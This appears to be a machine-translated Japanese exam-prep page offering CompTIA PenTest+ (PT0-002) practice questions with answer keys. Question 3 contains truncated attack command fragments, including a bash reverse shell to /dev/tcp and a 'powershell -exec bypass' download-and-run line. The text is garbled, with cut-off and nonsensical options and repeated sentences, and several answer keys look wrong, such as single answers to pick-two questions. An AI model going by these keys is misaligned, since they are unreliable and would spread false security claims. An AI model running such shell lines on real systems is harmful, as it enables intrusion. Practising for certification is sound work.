すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA PT0-002模擬試験であなたの認定試験の準備を強化する、CompTIA PenTest+認定資格|SPOTO

弊社のCompTIA PT0-002模擬試験問題集を利用してCompTIA PenTest+ (PT0-002)試験への準備を強化しましょう。最新の試験問題で練習して、認定試験の準備を効果的に進めましょう。弊社の総合的な学習教材は模擬試験、サンプル問題、試験問題集を含んでいて準備を徹底しています。CompTIA PenTest+認定資格は、侵入テストや脆弱性管理を任されているサイバーセキュリティの専門家のために特別に設計されています。CompTIAの模擬試験や試験シミュレーターを活用し、リアルな試験体験をすることで、自信と準備態勢を強化することができます。当社の試験資料と試験解答にアクセスして、重要な概念の理解と習得を強化してください。弊社の試験準備用リソースと模擬試験で、PT0-002試験に合格し、CompTIA PenTest+認定資格を取得するための十分な準備を整えてください。
他のオンライン試験を受ける
質問 #1
ある侵入テスト実施者が、特定のホストにEternalBlueの脆弱性があることに気づきました。この脆弱性から最もよく保護されるのはどれか。
A. ネットワークのセグメンテーション
B. キー回転
C. 暗号化されたパスワード
D. パッチ管理
回答を見る
正解: D
質問 #2
ある侵入テスト実施者が、あるクライアントとの契約に先立ち、以下のSOWを検討している:「ネットワーク図、論理的及び物理的な資産目録、並びに従業員の名前は、顧客の機密事項として扱われる。ネットワーク図、論理的および物理的な資産目録、従業員の名前は、顧客の機密として扱われる。SOWの情報に基づくと、次のどの動作になります。
A. 監査および検査のために、一般または顧客が利用できない独自の侵入テストツールを利用すること。
B. 公開鍵暗号を活用し、エンゲージメント完了時に調査結果が CISO に確実に届くようにする。
C. クライアントのシニア・リーダーシップ・チームを喜ばせるために、クライアントのアーキテクチャー内に存在する重大な脆弱性をクライアントと共有しなかった。
D. クライアントの公開IPアドレスを共有し、アンダーグラウンドのハッカー・フォーラムに助けを求める。
E. ソフトウェアベースの消去ツールを使って、侵入検査者のノートパソコンから顧客の調査結果を消去する。
F. 営業チームが将来の契約を計画できるように、SOWを侵入テスト実施者の社内に残しておくこと。
回答を見る
正解: A
質問 #3
Python -m SimpleHTTPServer 9891 次のコマンドのうち、exploitという名前のファイルをターゲットマシンにダウンロードして実行するために使用できるものはどれか。
A. nc 10
powershell -exec bypass -f \10. 0
C. bash -i >& /dev/tcp/10
D. wget 10
回答を見る
正解: B
質問 #4
次のうち、OWASPトップ10を最もよく表しているものはどれか(2つ選んでください)。
A. ウェブアプリケーションの最も重大なリスク
B. ウェブアプリケーションのリスク一覧
C. 重要性の高い順に定義されたリスク
D. ウェブアプリケーション・セキュリティ基準
E. リスク・ガバナンスとコンプライアンスの枠組み
F. Apacheの脆弱性のチェックリスト
回答を見る
正解: C
質問 #5
システム管理者と技術スタッフが閲覧するペネトレーションテスト報告書の修復セクションを記述する際に含めるべき情報は、次のうちどれですか?
A. 脆弱性の簡単な説明と、それを修正するための高レベルのコントロール
B. 漏洩した場合のビジネスへの影響に関する情報
C. エグゼクティブサマリーと検査会社に関する情報
D. アセスメントからの交戦規定
回答を見る
正解: D
質問 #6
あなたは、ウェブサーバの堅牢化を任されたセキュリティアナリストです。あなたは、悪意のある HTTP ペイロードのリストを渡されました。指示 以下の攻撃シグネチャが与えられたら、攻撃のタイプを決定し、今後攻撃を防ぐための関連する改善策を特定しなさい。シミュレーションの初期状態に戻したい場合は、[Reset All]ボタンをクリックしてください。
A. マスタード
B. マスターしていない
回答を見る
正解: C
質問 #7
enum4linux.plコマンドを実行した後、侵入テスト者は次の出力を受け取った:次のうち、侵入テスト担当者が次に実行すべきコマンドはどれですか?
A. smbspool //192
B. net rpc share -S 192
C. smbget //192
D. smbclient //192
回答を見る
正解: D
質問 #8
ある侵入テスト実施者がウェブサーバに対する脆弱性スキャンを完了し、1つだけ重大な脆弱性を特定しました。これが真陽性であることを確認する最も良い方法はどれか。
A. 別のスキャナーで比較してください。
B. サーバーで手動テストを実行する。
C. スキャナーで結果を確認する。
D. オンラインで脆弱性を探す。
回答を見る
正解: D
質問 #9
ある民間調査会社が、攻撃者がモバイル・デバイスにアクセスし、そのデバイスからデータを流出させ る可能性を判断するために、侵入テストを依頼しています。次のうち、成功すれば両方の目的を達成できる可能性が最も高いソーシャルエンジニアリング手法はどれか。
A. 悪意のあるアプリケーションをダウンロードするためのリンクを含む、なりすましのサービス番号でSMSを送信する。
B. MDMの脆弱性を悪用し、新しいアカウントとデバイスプロファイルを作成する。
C. ITヘルプデスクでビッシングを実行し、マスカレード用に承認されたデバイスのIMEIのリストを収集する。
D. 従業員がよく利用するウェブサイトに、x86アーキテクチャを標的としたマルウェアを侵入させる。
回答を見る
正解: B
質問 #10
ある企業が、製造工場のサイバーフィジカルシステムを調査するため、侵入テストチームを雇った。チームは、監視システムと PLC がともに会社のイントラネットに接続されていることを直ちに発見した。侵入テストチームが行ったと仮定した場合、最も妥当性が高いのはどれか。
A. PLCは、ネットワーク経由で注入されたコマンドには反応しません。
B. スーパーバイザーとコントローラーは、デフォルトでは別の仮想ネットワーク上にあります。
C. コントローラは、コマンドの発信元を検証しません。
D. 監督システムは、コード/コマンドの悪意のある注入を検出する。
回答を見る
正解: C
質問 #11
ある侵入テスト実施者が、インターネットに面したウェブアプリケーションに対して調査を実施し、フィッシングキャン ペーンを計画しています。ウェブサイトの技術的な連絡先を入手する受動的な方法として、最も適切なものはどれか。
A. WHOISドメイン検索
B. 求人広告
C. SSL証明書情報
D. 公開されたデータ漏洩のダンプ
回答を見る
正解: C
質問 #12
ある侵入テスト実施者は、サーバーから MD5 ハッシュを収集し、レインボーテーブルを使ってそのハッシュを簡単にクラックすることができました。次のうち、是正報告書に推奨事項として含めるべきものはどれか。
A. より強力なアルゴリズム要件
B. サーバーのアクセス制御
C. ユーザーパスワードの暗号化
D. パッチ管理プログラム
回答を見る
正解: D
質問 #13
あるウェブサイトに欠陥がないか調べるため、侵入テスト実施者が雇われた。テストのある時間帯に、ネットワーク・エンジニアが、ウェブ・サーバーへのGETリクエストが殺到し、ウェブサイトのレスポンス・タイムが80%低下していることに気づく。ネットワークエンジニアは侵入テスト実施者に連絡し、これらのGETリクエストがテストの一部であるかどうかを確認します。侵入テスト実施者に確認する目的について、最も適切なものはどれですか?
A. 状況認識
B. リスケジュール
C. DDoS防御
D. デコンフリクション
回答を見る
正解: B
質問 #14
手動の Web アプリケーションセキュリティ評価を実施するのに最も適しているツールはどれですか?(つ選んでください。)
A. OWASP ZAP
B. Nmap
C. ネサス
D. ビーエフ
E. ヒドラ
F. バープ・スイート
回答を見る
正解: AF
質問 #15
あるレッドチームが、ある契約期間中に顧客の内部ネットワークにアクセスし、レスポンダツールを使用して重要なデータをキャプチャしました。テストチームがキャプチャしたのは次のうちどれですか?
A. 複数のハンドシェイク
B. IPアドレス
C. 暗号化されたファイル転送
D. SMB経由で送信されるユーザーハッシュ
回答を見る
正解: C
質問 #16
SCADA機器のある環境に対してペネトレーションテストを実施することは、さらなる安全上のリスクをもたらす:
A. デバイスはより多くの熱を発生し、より多くの電力を消費する。
B. 機器が古くなり、交換できなくなった。
C. プロトコルを理解するのはより難しい。
D. デバイスは物理的な世界への影響を引き起こす可能性がある。
回答を見る
正解: B
質問 #17
ある侵入テスト実施者が、侵入テストの一環として、クライアントの Web サイトで脆弱性スキャンを実施する予定である。テスト実施者は、検出を回避しながら脆弱性を探索する複数のNmapスクリプトを実行する予定です。侵入テスト実施者は、次の Nmap オプションのうち、どれを利用する可能性が最も高いですか。
A. -8 -T0
B. --スクリプト "http*vuln*"
C. -スネ
D. -O
回答を見る
正解: C
質問 #18
開発者向けに書かれた侵入テスト報告書に記載すべき情報で、最も重要なものはどれか。
A. 要旨
B. 修復
C. 方法論
D. 指標と尺度
回答を見る
正解: A

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.